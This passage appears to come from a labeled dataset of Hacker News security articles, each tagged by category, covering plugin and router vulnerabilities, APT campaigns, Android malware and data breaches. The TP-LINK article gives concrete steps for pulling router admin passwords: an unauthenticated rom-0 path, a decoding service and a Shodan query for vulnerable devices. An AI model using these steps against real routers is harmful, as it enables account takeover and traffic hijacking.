response is to handle every situation in a way that limits damage, and reduces recovery time and costs. At the end of the day, that's how you'll be measured on a job well done… not that you've covered every angle of every potential vulnerability. Start with Simple Steps. Attackers are Lazy. Attackers have technical and economic imperatives to use the minimum amount of effort and resources to breach their targets - the more you remove the low-hanging fruit on your network, the more you raise the actual level of work an attacker has to expend to successfully infiltrate it. AlienVault has recently created a 5 chapter eBook titled the Insider's Guide to Incident Response that goes further into fundamental strategies that can help you create an efficient and effective incident response plan. The eBook covers: Arming & Aiming Your Incident Response Team Incident Response Process and Procedures Types of Security Incidents Incident Response Tools Incident Response Training You can download the entire eBook at AlienVault's website here. Learn more about AlienVault USM: Download a free 30-day trial Watch a demo on-demand Play with USM in our product sandbox (no download required) ",Cyber_Attack WordPress plugin W3 Total Cache critical Vulnerability disclosed,https://thehackernews.com/2012/12/wordpress-plugin-w3-total-cache_26.html,"One of the most popular Wordpress Plugin called ""W3 Total Cache"" which is used to Improve site performance and user experience via caching, having potential vulnerability. On Christmas day, someone disclose it on full-disclosure site that how a plugin misconfiguration leads to possible Wordpress cms hack. The loophole is actually activated on the fact that how W3TC stores the database cache. Jason disclosed that cache data is stored in public accessible directory, from where a malicious attack can can retrieve password hashes and other database information. Default location where this plugin stores data is ""/wp-content/w3tc/dbcache/"" and if directory listing is enabled, attacker can browse and download it. He said,""Even with directory listings off, cache files are by default publicly downloadable, and the key values / file names of the database cache items are easily predictable."" Because the plugin is very famous ,so this makes quite easy for hackers to play with WordPress blogs. Author also publish a simple shell script to identify and exploit this bug. We would like to recommend webmasters to either upgrade the plugin to new version or deny access to plugin directory by making an extra .htccess in that folder. Update 29-Dec-2012 : WordPress plugin W3 Total Cache updated to version 0.9.2.5 with fix for above vulnerability. Change Log : Fixed security issue that can occur if using database caching to disk. If using database caching to disk with a web server with directory listing or web accessible wp-content/w3tc/dbcache/* directories. This patch works for all hosting environments / types where PHP is properly configured, i.e. .htaccess modifications (or other web server configuration changes) are *not* necessary to ensure proper security. Empty the database cache after performing the update if you use database caching to disk. Download W3 Total Cache Plugin for Wordpress ",Vulnerability Adult Friend Finder... Hacked & 3.5 Million Users' Database Leaked Online,https://thehackernews.com/2015/05/adult-friend-finder.html,"Until now, hackers have targeted companies and websites that hold your credit card details or medical information, but now they are showing interest in your sex life instead. You heard it right. Adult Friend Finder, a casual dating website with the tagline ""hookup, find sex or meet someone hot now"", has suffered a massive data breach. Nearly 4 Million users of AdultFriendFinder have had their personal details, including email addresses, usernames, dates of birth, postcodes and IP addresses, exposed on the dark web for sale online. The Channel 4 news site broke the story on Thursday and warned users of the California-based dating site with 64 million members who want to have sex and one night stands with strangers. Nearly 4 Million Sex Life Exposed!!! The leaked data also includes the information on whether the users are gay or straight and even which ones might be seeking extramarital affairs. This data could be goldmines for hacker trying to blackmail people to extort money, and Channel 4 says this may already be happening. Shaun Harper is one of those members whose details were made public, even after he already had deleted his account. This clearly indicates that AdultFriendFinder do not get rid of data after customers leave. So far, no hacking group or individual has claimed responsibility for the hack, but this data breach is embarrassing for those who had their sex life exposed in just one shot. Now, let's have a look at what AdultFriendFinder parent company FriendFinder Networks has to say on its part? FriendFinder Networks confirmed that there has been a data breach at AdultFriendFinder, but would not specify how many customers have been affected by the hack and to what extent. Here's a statement by FriendFinder Networks offered to Channel 4 News: ""FriendFinder Networks Inc understands and fully appreciates the seriousness of the issue. We have already begun working closely with law enforcement and have launched a comprehensive investigation with the help of leading third-party forensics expert. We pledge to take the appropriate steps needed to protect our customers if they are affected."" According to Channel 4, the leaked data has come from a hacker nicknamed ROR[RG] who posted the details of users of Adult FriendFinder to an online forum. It appears that the hacker attempted to blackmail the users to extort $100,000 before publishing the data online. ",Data_Breaches Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!,https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html,"Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks. The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020. The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues. Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack. Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague said the ""vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program."" The vulnerabilities have been addressed in the following products: BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3 BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2 Besides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues. The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution. The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a ""broad scanning activity for the presence of this vulnerability across federal departments and agencies."" ""This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,"" said Matt ""Pwn all the Things"" Tait in a tweet. ",Vulnerability Reflection DDoS Attacks Using Millions of UPnP Devices on the Rise,https://thehackernews.com/2014/10/reflection-ddos-attacks-using-millions_16.html,"After successful in launching reflection and amplification Distributed Denial-of-Service (DDoS) attacks by abusing various protocols such as DNS, NTP and SMTP, hackers are now abusing Simple Service Discovery Protocol (SSDP) – part of the UPnP protocol standard – to target home and office devices, researchers warned. SSDP is a network protocol based on the Internet Protocol Suite that comes enabled on millions of networked devices, such as computers, printers, Internet gateways, Router / Wi-Fi access points, mobile devices, webcams, smart TVs and gaming consoles, to discover each other and automatically establish working configurations that enable data sharing, media streaming, media playback control and other services. FLAW IN UPnP USED IN AMPLIFICATION DDoS ATTACK Prolexic Security Engineering & Response Team (PLXsert) at Akamai Technologies have issued a warning that the devices use in residential or small office environments are being co-opted into reflection and amplification distributed denial-of-service (DDoS) attacks since July that abuse communications protocols enabled on UPnP devices. ""The rise of reflection attacks involving UPnP devices in an example of how fluid and dynamic the DDoS crime ecosystem can be in identifying, developing and incorporating new resources and attack vectors into its arsenal,"" the advisory states. ""Further development and refinement of attack payloads and tools is likely in the near future."" The weakness in the Universal Plug-and-Play (UPnP) standard could allow an attacker to compromise millions of its consumer and business devices, which could be conscripted by them to launch an effective DDoS attack on a target. Attackers have found that Simple Object Access Protocol (SOAP) – protocol used to exchange sensitive information in a decentralized, distributed environment – requests ""can be crafted to elicit a response that reflects and amplifies a packet, which can be redirected towards a target."" This UPnP attack is useful for both reflection attacks, given the number of vulnerable devices, and amplification as researchers estimate that it can magnify attack traffic by a factor of 30, according to the advisory. OVER 4.1 MILLIONS DEVICES VULNERABLE According to the security researchers, about 38 percent of the 11 million Internet-facing UPnP devices, i.e. over 4.1 million devices, in use are potentially vulnerable to being used in this type of reflection DDoS attack. ""The number of UPnP devices that will behave as open reflectors is vast, and many of them are home-based Internet-enabled devices that are difficult to patch,"" said Akamai security business unit senior vice president and general manager Stuart Scholly. ""Action from firmware, application and hardware vendors must occur in order to mitigate and manage this threat."" MAJOR TARGETED COUNTRIES South Korea has the largest number of vulnerable devices, followed by the United States, Canada, and China, according to the advisory. This isn't the first time when a security flaw in UPnP has allowed attackers to target home and business devices, back in January 2013, a flaw in UPnP exposed more than 50 millions computers, printers and storage drives to attack by hackers remotely. ",Vulnerability Your Linux Can Get Hacked Just by Opening a File in Vim or Neovim Editor,https://thehackernews.com/2019/06/linux-vim-vulnerability.html,"Linux users, beware! If you haven't recently updated your Linux operating system, especially the command-line text editor utility, do not even try to view the content of a file using Vim or Neovim. Security researcher Armin Razmjou recently discovered a high-severity arbitrary OS command execution vulnerability (CVE-2019-12735) in Vim and Neovim—two most popular and powerful command-line text editing applications that come pre-installed with most Linux-based operating systems. On Linux systems, Vim editor allows users to create, view or edit any file, including text, programming scripts, and documents. Since Neovim is just an extended forked version of Vim, with better user experience, plugins and GUIs, the code execution vulnerability also resides in it. Code Execution Flaw in Vim and Neovim Razmjou discovered a flaw in the way Vim editor handles ""modelines,"" a feature that's enabled-by-default to automatically find and apply a set of custom preferences mentioned by the creator of a file near the starting and ending lines in the document. Though the editor only allows a subset of options in modelines (for security reasons) and uses sandbox protection if it contains an unsafe expression, Razmjou revealed that using "":source!"" command (with a bang [!] modifier) can be used to bypass the sandbox. Therefore, just opening an innocent looking specially crafted file using Vim or Neovim could allow attackers to secretly execute commands on your Linux system and take remote control over it. The researcher has also released two proof-of-concept exploits to the public, one of which demonstrates a real-life attack scenario wherein a remote attacker gains access to a reverse shell from the victim's system as soon as he/she opens a file on it. The maintainers of Vim (patch 8.1.1365) and Neovim (released in v0.3.6) have released updates for both utilities to address the issue, which users should install as soon as possible. Besides this, the researcher has also recommended users to: disable modelines feature, disable ""modelineexpr"" to disallow expressions in modelines, use ""securemodelines plugin,"" a secure alternative to Vim modelines. ",Vulnerability Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions,https://thehackernews.com/2021/03/chinese-hackers-targeted-indias-power.html,"Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups. The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector. ""10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure,"" Recorded Future said in a report published yesterday. ""Other targets identified included 2 Indian seaports."" Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited. Pinning the intrusions on a new group dubbed ""RedEcho,"" investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team. Border conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China formally identified four casualties on its side for the first time on February 19. In the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to ""national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India."" Noting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors. Additionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October. While initial probe conducted by the cyber department of the western Indian state of Maharashtra traced the attack to malware identified at a Padgha-based State Load Despatch Centre, the researchers said, ""the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated."" ""However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres,"" they added. Interestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a decade-long hacking spree targeting more than 100 high-tech and online gaming companies. But it's not just China. In the weeks leading to the clashes in May, a state-sponsored group called Sidewinder — which operates in support of Indian political interests — is said to have singled out Chinese military and government entities in a spear-phishing attack using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China. The modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people. ""The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure,"" the researchers concluded. ""Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure."" We have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back. UPDATE A major power blackout that struck Mumbai last October may have been the result of a deliberate act of cyber sabotage, according to a preliminary report released by Maharashtra Cyber Cell said on Wednesday, adding it found possible evidence of 14 ""Trojan horses"" and 8GB of unexplained data deployed in the city's power system. In a statement to Reuters, China denied responsibility for carrying out the attack. ",Cyber_Attack Chinese Hackers Carried Out Country-Level Watering Hole Attack,https://thehackernews.com/2018/06/chinese-watering-hole-attack.html,"Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks. The campaign is believed to be active covertly since fall 2017 but was spotted in March by security researchers from Kaspersky Labs, who have attributed these attacks to a Chinese-speaking threat actor group called LuckyMouse. LuckyMouse, also known as Iron Tiger, EmissaryPanda, APT 27 and Threat Group-3390, is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year. The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors. This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain ""access to a wide range of government resources at one fell swoop."" According to the researchers, the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks. Although LuckyMouse has been spotted using a widely used Microsoft Office vulnerability (CVE-2017-11882) to weaponize Office documents in the past, researchers have no proofs of this technique being used in this particular attack against the data center. The initial attack vector used in the attack against the data center is unclear, but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center. The attack against the data center eventually infected the targeted system with a piece of malware called HyperBro, a Remote Access Trojan (RAT) deployed to maintain persistence in the targeted system and for remote administration. ""There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites,"" the researchers said in a blog post published today. ""These events suggest that the data center infected with HyperBro and the waterholing campaign are connected."" As a result of the waterholing attack, the compromised government websites redirected the country's visitors to either penetration testing suite Browser Exploitation Framework (BeEF) that focuses on the web browser, or the ScanBox reconnaissance framework, which perform the same tasks as a keylogger. The main command and control (C&C) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP, specifically to a MikroTik router running a firmware version released in March 2016. Researchers believe the Mikrotik router was explicitly hacked for the campaign in order to process the HyperBro malware's HTTP requests without detection. ",Cyber_Attack Beware: New Android Spyware Found Posing as Telegram and Threema Apps,https://thehackernews.com/2020/10/android-mobile-hacking.html,"A hacking group known for its attacks in the Middle East, at least since 2017, has recently been found impersonating legitimate messaging apps such as Telegram and Threema to infect Android devices with a new, previously undocumented malware. ""Compared to the versions documented in 2017, Android/SpyC23.A has extended spying functionality, including reading notifications from messaging apps, call recording and screen recording, and new stealth features, such as dismissing notifications from built-in Android security apps,"" cybersecurity firm ESET said in a Wednesday analysis. First detailed by Qihoo 360 in 2017 under the moniker Two-tailed Scorpion (aka APT-C-23 or Desert Scorpion), the mobile malware has been deemed ""surveillanceware"" for its abilities to spy on the devices of targeted individuals, exfiltrating call logs, contacts, location, messages, photos, and other sensitive documents in the process. In 2018, Symantec discovered a newer variant of the campaign that employed a malicious media player as a lure to grab information from the device and trick victims into installing additional malware. Then earlier this year, Check Point Research detailed fresh signs of APT-C-23 activity when Hamas operators posed as young teenage girls on Facebook, Instagram, and Telegram to lure Israeli soldiers into installing malware-infected apps on their phones. The latest version of the spyware detailed by ESET expands on these features, including the ability to collect information from social media and messaging apps via screen recording and screenshots, and even capture incoming and outgoing calls in WhatsApp and read the text of notifications from social media apps, including WhatsApp, Viber, Facebook, Skype, and Messenger. The infection begins when a victim visits a fake Android app store called ""DigitalApps,"" and downloads apps such as Telegram, Threema, and weMessage, suggesting that the group's motivation behind impersonating messaging apps is to ""justify the various permissions requested by the malware."" In addition to requesting invasive permissions to read notifications, turn off Google Play Protect, and record a user's screen under the guise of security and privacy features, the malware communicates with its command-and-control (C2) server to register the newly infected victim and transmit the device information. The C2 servers, which typically masquerade as websites under maintenance, are also responsible for relaying the commands to the compromised phone, which can be used to record audio, restart Wi-Fi, uninstall any app installed on the device, among others. What's more, it also comes equipped with a new feature that allows it to stealthily make a call while creating a black screen overlay to mask the call activity. ""Our research shows that the APT-C-23 group is still active, enhancing its mobile toolset and running new operations. Android/SpyC32.A – the group's newest spyware version — features several improvements making it more dangerous to victims,"" ESET said. Apps downloaded from fraudulent third-party app stores has been a conduit for Android malware in recent years. It's always essential to stick to official sources to limit risk, and scrutinize permissions requested by apps before installing them on the device. ",Malware "Exclusive: More than 200,000 Algerian TP-LINK Routers are vulnerable to Hackers",https://thehackernews.com/2014/01/TP-LINK-Routers-password-hacking.html,"More than 15.2% of the Algerian population use Internet service which is provided by around 30 Internet Service Providers and one of the largest shares is served by Algerie Telecom. Algerie Telecom provides TP-LINK TD-W8951ND Router to most of their home customers who Opt-In for Internet services and each of which has ZYXEL embedded firmware installed in it. ABDELLI Nassereddine, penetration tester and Algerian Computer Science Student has reported highly critical unauthorized access and password disclosure vulnerabilities in the Routers provided by Algerie Telecom. He told 'The Hacker News' that the vulnerabilities can be exploited by any remote hacker just by exploiting a very simple loophole in the firmware. First, he found that an unauthorized access is available to 'Firmware/Romfile Upgrade' Section on the Router's panel that can be accessed without any login password i.e. https://IP//rpFWUpload.htmlThis page actually allows a user to upgrade the Firmware of the router and also allows to download the Romfile Backup file (rom-0) i.e. https://IP address/rom-0 (as shown) This Romfile contains the administrative password of the Router and can be retrieved in plain text by reverse engineering it using a free online service: https://50.57.229.26/zynos.php. One just need to upload the Romfile and can get plain text output easily. Router's password will be displaced in the very first line of the output, as shown below: He claimed that he has tested the IP address range that belongs to Algeria i.e. 41.107. x. x and found thousands of them are vulnerable to hackers. A Quick search on SHODAN Search Engine using keyword 'RomPager country:dz' showing more than 2,59,744 devices available on the Internet and 95% of them are now at risk. ABDELLI also submitted an automated exploit POC script on GITHUB, that can scan the complete subnet for vulnerable routers and will display respective passwords on the screen, as shown: I have tested the flaw over 100's of routers, and found this as a very critical bug. Simply by changing the DNS servers from the victim's router, one can redirect the users' traffic to any malicious server. Such attacks allow hackers to inject the malicious DNS server to perform advance phishing attacks against Facebook, Gmail, Bank Accounts and also whole system can also be compromised. There is no patch yet available from the vendor, so to prevent yourself from such vulnerability you can forward port 80 to any other website or unused IP address of your network. ",Vulnerability "Here's the Facebook Hacking Tool that Can Really Hack Accounts, But...",https://thehackernews.com/2016/02/facebook-hacking-tool.html,"Yes, you heard me right. A newly discovered Facebook hacking tool actually has the capability to hack Facebook account, but YOURS, and not the one you desire to hack. How to Hack Facebook account? How to Hack my Girlfriends Facebook account? My boyfriend is cheating on me, How do I hack his Facebook Account? These are the queries that most of the Internet users search on Google. But Beware! If you come across any Facebook hacking tool that promises you to help you hack your friends Facebook accounts, you may end up downloading a hacking tool that could hack you, instead of them. Facebook Hacking Tool that Can Really Hack, But Your Accounts Dubbed Remtasu, the tool is marketing itself as a Facebook hacking tool but actually is a Windows-based Trojan that has accelerated globally over the past year, and has now capability to disguise itself as an app for accessing people's Facebook account credentials. The tool contains a Keylogger that can capture all your keystrokes and store them in a file that is subsequently sent to the attacker's server. The malicious Facebook hacking tool is exploiting ""the constant desire of a lot of users to take control of accounts from this well-known social network,"" according to a Monday blog post by IT security company ESET. How Remtasu Works: The malicious tool is delivered via direct download websites. Once a user visits one of these websites, the dangerous Win32/Remtasu.Y malware automatically gets downloaded and executed on victim's machine and hide itself among other files. Remtasu has capability to: Open and obtain information from the clipboard. Capture keystrokes. Store all the data in a file which is subsequently sent to an FTP server. The worst part is yet to come: The malware remains on the infected computer even when the victim reboots their system or attempts to find the malware threat in the list of active processes. ""In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder,"" reads the post. ""The new InstallDir folder remains hidden inside the system files, making it difficult for users to access."" Most affected parts of the world include Colombia, Turkey, Thailand and elsewhere. In past, Remtasu was distributed through malicious files attached to phishing emails purporting to be from legitimate government or businesses organisations. ",Malware Tumblr Patches A Flaw That Could Have Exposed Users' Account Info,https://thehackernews.com/2018/10/tumblr-account-hacking.html,"Tumblr today published a report admitting the presence of a security vulnerability in its website that could have allowed hackers to steal login credentials and other private information for users' accounts. The affected information included users email addresses, protected (hashed and salted) account passwords, self-reported location (a feature no longer available), previously used email addresses, last login IP addresses, and names of the blog associated with every account. According to the company, a security researcher discovered a critical vulnerability in the desktop version of its website and responsibly reported it to the Tumblr security team via its bug bounty program. Though the company has not revealed the researcher's name or any technical details about the vulnerability, Tumblr has disclosed that the flaw resided in the ""Recommended Blogs"" feature of its website. Recommended Blogs has been designed to display a short, rotating list of blogs of other users that may be of interest. The feature appears only for logged-in users. Tumblr also says: ""If a blog appeared in the module, it was possible, using debugging software in a certain way, to view certain account information associated with the blog."" In short, your account could only be affected if it was recommended to some an attacker via the vulnerable feature. The company fails to determine which specific accounts were recommended via the vulnerable feature, thus is unable to disclose the number of affected users, but it concludes that ""the bug was rarely present."" Tumblr also assured that its internal investigation found no evidence of the bug being abused by an attacker. ""It's our mission to provide a safe space for people to express themselves freely and form communities around things they love,"" Tumblr says. ""We feel that this bug could have affected that experience. We want to be transparent with you about it. In our view, it's simply the right thing to do."" Tumblr disclosure comes less than a week after Facebook announced its worst-ever security breach that allowed attackers to steal personal information, including secret access tokens, for 30 million users. Also, over a week ago Google announced the shut down of its social media network Google+ following a massive data breach that exposed the private data of hundreds of thousands of Google Plus users to third-party developers. Late last month, Twitter also revealed a similar security breach incident in which an API flaw inadvertently exposed direct messages (DMs) and protected tweets of more than 3 million people to unauthorized third-party app developers. ",Vulnerability Turkish Hacker Crashes Google Play Store Twice while testing vulnerability,https://thehackernews.com/2014/03/turkish-hacker-crashes-google-play.html,"Last Weekend Google Play Store was crashed twice by a Turkish hacker when he tried to test vulnerability he discovered on the Android apps publishing system, known as Google's Developer Console. Turkish hacker 'Ibrahim Balic' claimed responsibility for the Google Play Store attack and told 'The Hacker News', he found a flaw in the Android operating system while working with Android tools i.e. Compiler, debugger on his Emulators, that was crashing again and again. 'I successfully confirmed that it affects Android 4.2.2 , 4.3 and 2.3' he said. Then he created an Android app to exploit the vulnerability, 'causes a possible memory corruption' and uploaded it to the Google's Developer Console. Unfortunately, OR Luckily the malformed Android app crashed whole Google's Developer Console, and he didn't expect that the app will knock everyone offline from Play Store. He was not sure about the outage caused by him or not, ""I just wanted to be sure about (the) vulnerability,"" so he uploaded the 'malformed APK file' again second time to the Google Play Store, that results in crash of Google Play Store, not once, but twice. The first crashed around mid-day on Sunday and the same happened again on Monday when he tried a second time, leaving Android users unable to download new apps and games, and developers unable to update their own apps. However, the outage was so minimal that not many of us even noticed. This is not the first time he messed up with app stores. Last July, Apple was forced to take its developer site offline after Ibrahim uncovered multiple vulnerabilities in it. He also apologized for the inconvenience caused to his online fellows. ""I didn't have any malicious aim,"" Ibrahim said to CNN Money. ""I am so sorry for this damage."" Ibrahim reported the flaw to the Google Security Team and has yet to hear back from them about the issue. The Play Store is becoming much wider, and Google should focus hard on their security parameters. ",Vulnerability First Android Ransomware that Encrypts SD Card Files,https://thehackernews.com/2014/06/first-android-ransomware-that-encrypts.html,"We have seen cybercriminals targeting PCs with Ransomware malware that encrypts your files or lock down your computer and ask for a ransom amount to be paid in a specified duration of time to unlock it. To deliver the Ransomware malwares to the mobile devices, cyber criminals have already started creating malicious software programs for android devices. Last month, we reported about a new Police Ransomware malware that locks up the devices until the victims pay a ransom to get the keys to unlock the phone. But, the malware just lock the mobile screen and a loophole in the its implementation allowed users to recover their device and data stored on SDcard. Now, in an effort to overcome this, threat actors have adopted encryption in the development of mobile Ransomware malwares. Recently, the security firm ESET has discovered a new Android ransomware, dubbed as Android/Simplocker.A, that has ability to encrypt the files on the device SD card and then demand a ransom from the victim in order to decrypt those files. Once installed, the malware scans the SD card for certain file types such as image, document or video with extensions - jpeg, jpg, png, bmp, gif, pdf, doc, docx, txt, avi, mkv, 3gp, mp4 and encrypts them using AES in a separate thread in the background. After encrypting the files, the malware displays the following ransom message, written in Russian, which clearly means that this threat is targeting Russian Android users. ""WARNING your phone is locked! The device is locked for viewing and distributing child pornography , zoophilia and other perversions. To unlock you need to pay 260 UAH. 1.) Locate the nearest payment kiosk. 2.) Select MoneXy 3.) Enter {REDACTED}. 4.) Make deposit of 260 Hryvnia, and then press pay. Do not forget to take a receipt! After payment your device will be unlocked within 24 hours. In case of no PAYMENT YOU WILL LOSE ALL DATA ON your device!"" The Ransomware malware directs victim to pay the ransom amount i.e. 260 UAH, which is roughly equal to $21 US, through the MoneXy service, as this payment service is not easily traceable as the regular credit card. To maintain anonymity the malware author is using the Command-and-Control server hosted on TOR .onion domain and the malware sends the information of the infected device such as IMEI number to its server. The researchers at ESET are still analysing the malware: ""Our analysis of the Android/Simplock.A sample revealed that we are most likely dealing with a proof-of-concept or a work in progress – for example, the implementation of the encryption doesn't come close to ""the infamous Cryptolocker"" on Windows."" The researchers have found that the malware is capable to encrypt the victim's files, which could be lost if the decryption key is not retrieved from the malware author by paying the ransom amount, but on the other hand the researchers strongly advise users against paying fine, as their is no guarantee that the hacker will provide you decryption keys even after paying the amount. Unfortunately, mobile antivirus products are only capable to detect such known/detected threats only and can't detect similar the new threats. So, it is important for you to always keep the back-up of all your files either manually on the computer system or use cloud backup services like dropbox, google drive etc, in order to protect it from the emerging threats. ",Malware Tracy Morgan Dead? Facebook Scam Targeting Users with Malware,https://thehackernews.com/2014/06/tracy-morgan-dead-facebook-scam.html,"Oh MY God! Is Tracy Morgan Really Dead? NO, Thankfully it's only a hoax, but scammers announced the popular comedian and actor Tracy Morgan dead. Another Facebook scam is circulating across the social networking website just a day before the former ""Saturday Night Live"" and ""30 Rock"" star Tracy Morgan was critically hurt in a six-vehicle fatal accident on the New Jersey Turnpike that killed his friend and writer 62-year-old James McNair. With the rise in various scams on the popular social networking giant, Facebook that has more than one billion active users, it became very clear that not only does the social networking platform provide special opportunities for people to connect and share information, but serves as a great platform for scammers as well. TOTAL SCAM LEADS TO MALWARE Scammers spare no incident to target as many victims as possible, and this time they made use of this roadway accident to target users by spreading the fake Facebook videos proclaiming the death of Tracy Morgan. Malwarebytes warned about the Morgan video scam, saying that the fake video tricks users into sharing it that are spreading throughout the social network, with the Title, ""[Death Video] R.I.P. Tracy Morgan died few minutes ago in hospital."" Once clicked, users are directed to share the fake videos and along with the video sharing, the spam leads users to download a file, which could be anything from a Potentially Unwanted Program (PUP) to a malicious software that could steal users' sensitive or financial information from the infected system. TRACY MORGAN DEAD? RUMORS REACHED TWITTER AS WELL In response to this false news, people began tweeting that Tracy had passed away on June 10. The fake news spread like fire on the internet. Following are the tweets by his Fans: JUST IGNORE IT ""Pay no attention to scammy and sensational sounding videos appearing on your Facebook feed and stick to trusted news sources for breaking stories and information,"" warned Malwarebytes. ""Surveys are always a pain, but scam sites offering up random redirects always carry the potential to be even more problematic – you simply never know where you're going to end up."" We have seen various suspicious posts on Facebook, like ""See your Friend's naked video"", an app offering you a chance to see who has viewed your Facebook profile, and many more. Sometimes these scams are very obvious and easily avoidable, but many times they are irresistible and easy to fall for, like this new fake video scam. SCAMS AT RISE, SO BE SAFE With more tech skills, modern scammers have ability to reach billions of potential victims with just a single message or post, and their scams are getting more dangerous and critical day-by-day. Despite Facebook's security measures, safe and secured social networking rests in your own hands and if you aren't paying attention to such scams, you could fall for one such even without ever realizing. So, if you are served with any suspicious link or post, do not try to click on it, no matter even if it's from your closest friend. ",Malware Warning: Android Bitcoin wallet apps vulnerable to theft,https://thehackernews.com/2013/08/hacking-bitcoin-android-vulnerability-digital-wallets.html,"A critical vulnerability in the Android implementation of the Java SecureRandom random number generator was discovered, that leaves Bitcoin digital wallets on the mobile platform vulnerable to theft. Before the announcement was made, users on the forums had noticed over 55 BTC were stolen a few hours after the client improperly signed a transaction using the compromised random number generator. Bitcoin is a virtual currency that makes use of cryptography to create and transfer bitcoins. Users make use of digital wallets to store bitcoin addresses from which bitcoins are received or sent. Bitcoin uses public-key cryptography so that each address is associated with a pair of mathematically linked public and private keys that are held in the wallet. Because the problem is rooted in the operating system, every Bitcoin digital wallet generated by an Android app is affected by the weakness, including Bitcoin Wallet, blockchain.info wallet, Bitcoin Spinner, and Mycelium Wallet. The developers have recommended that users generate a new address with a repaired random number generator and then send all the money in the wallet back to themselves. If you use an Android wallet then we strongly recommend you to upgrade to the latest version available in the Play Store as soon as one becomes available. The virtual currency that can be transferred worldwide using peer-to-peer software is forcing bids to regulate it, including in the U.S. The Financial Crimes Enforcement Network of the U.S Department of the Treasury. ",Vulnerability "Book Review: Hacking Point of Sale, In-Depth Study on Payment Applications",https://thehackernews.com/2014/05/book-review-hacking-point-of-sale-in.html,"Point-of-sale (POS) is the hottest topic in payment structures and its one of the most popular technology topics as well. A Point-of-sale (POS) machine is a computerized replacement for a cash register. It has ability to quickly process a customer's transaction, accurately keep the records, process credit and debit cards, connect to other systems in a network, and manage inventory. A basic POS system would consist of a computer as its core part provided with application specific programs for the particular environment in which it will serve, along with a cash drawer, barcode scanner, receipt printer and the appropriate POS software. Point-of-sale (POS) terminals are used in most industries that have a point of sale such as a service desk, including restaurants, lodging, entertainment, and museums. Due to the better track inventory and accuracy of records, the Point-of-sale (POS) machine is used worldwide and it can be easily set-up, depending on the nature of the business. But on the other hand, Point-of-sale (POS) systems are critical components in any retail environment and the users are not aware of the emerging threats it poses in near future. Last week I read an excellent book entitled 'HACKING POINT OF SALE', written by Slava Gomzine, that summarizes, systemizes, and shares knowledge about payment application security. In the Book, the author covers all the aspects of card payment processing from the security point of view that mainly depends on confidentiality, integrity, and availability. In past few months, we have seen many massive data breaches targeting POS machines and the largest one is TARGET data breach occurred during the last Christmas 